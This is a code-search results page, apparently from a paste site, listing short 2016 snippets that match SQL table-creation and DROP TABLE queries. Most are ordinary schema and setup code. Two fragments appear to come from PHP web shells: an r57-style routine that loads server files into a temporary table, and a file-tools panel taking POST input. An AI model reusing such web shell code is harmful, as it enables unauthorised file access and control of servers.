42.7K results in 829 ms
10 years ago · Sep 07, 2016, 11:44 AM
filter started"); String sqlCreate = "CREATE TABLE IF NOT EXISTS ACCEL_HIGH_PASS ( ts integer, z
10 years ago · Sep 07, 2016, 11:02 AM
TABLE IF EXISTS %(name)s;\nCREATE TABLE IF NOT EXISTS `%(name)s`%(sub)s\n" line = line % dict(name=name,
10 years ago · Sep 07, 2016, 10:48 AM
DROP TABLE IF EXISTS `hts_modelset`; CREATE TABLE `hts_modelset` ( `id` INT(10) unsigned NOT NULL AUTO_INCREMENT, `name` VARCHAR(32)
10 years ago · Sep 07, 2016, 09:42 AM
necessary if the firewall exists. If not, then you will get
10 years ago · Sep 07, 2016, 08:36 AM
sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1;
10 years ago · Sep 07, 2016, 07:54 AM
initialize @db = SQLite3::Database.new(DB_NAME) db.execute('CREATE TABLE IF NOT EXISTS requests (id text primary
10 years ago · Sep 07, 2016, 05:24 AM
14:44:02] [Client thread/INFO] [NEIAddons|CraftingTables]: Not registering BC Autorcrafting Table [14:44:02] [Client thread/INFO] [NEIAddons|CraftingTables]:
10 years ago · Sep 07, 2016, 05:06 AM
DROP TABLE IF EXISTS gym; CREATE TABLE gym (gym_id VARCHAR(50) NOT NULL PRIMARY KEY, team_id
10 years ago · Sep 07, 2016, 04:58 AM
DROP TABLE IF EXISTS gym; CREATE TABLE gym ('gym_id' VARCHAR(50) NOT NULL PRIMARY KEY, 'team_id'
10 years ago · Sep 07, 2016, 04:56 AM
DROP TABLE IF EXISTS 'gym'; CREATE TABLE 'gym' ('gym_id' VARCHAR(50) NOT NULL PRIMARY KEY, 'team_id'
10 years ago · Sep 07, 2016, 03:00 AM
CREATE TABLE IF NOT EXISTS `players` ( `uid` int(12) NOT
10 years ago · Sep 07, 2016, 01:08 AM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW
10 years ago · Sep 07, 2016, 01:00 AM
if(@mysql_select_db($_POST['test3_md'],$db)) { $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; @mysql_query($sql); $sql = "LOAD
10 years ago · Sep 07, 2016, 12:44 AM
if not ReturnBoard then -- create board if not created print("Creating Trello Board")
10 years ago · Sep 06, 2016, 11:06 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
10 years ago · Sep 06, 2016, 08:56 PM
structure for table `nl1_addons` -- CREATE TABLE IF NOT EXISTS `nl1_addons` ( `id` int(11) NOT
10 years ago · Sep 06, 2016, 08:00 PM
vorona kernel: ACPI: Early table checksum verification disabled Ñен
10 years ago · Sep 06, 2016, 07:44 PM
DROP DATABASE IF EXISTS Courses2; CREATE DATABASE Courses2; USE Courses2; /* Schema */ CREATE TABLE `Department` ( `id` INT(11) NOT
10 years ago · Sep 06, 2016, 06:22 PM
table = classToCreate.getAnnotation(DynamoDBTable.class) try { // Check if the table exists client.describeTable(table.tableName()) } catch (ResourceNotFoundException e)
Total pages: 2134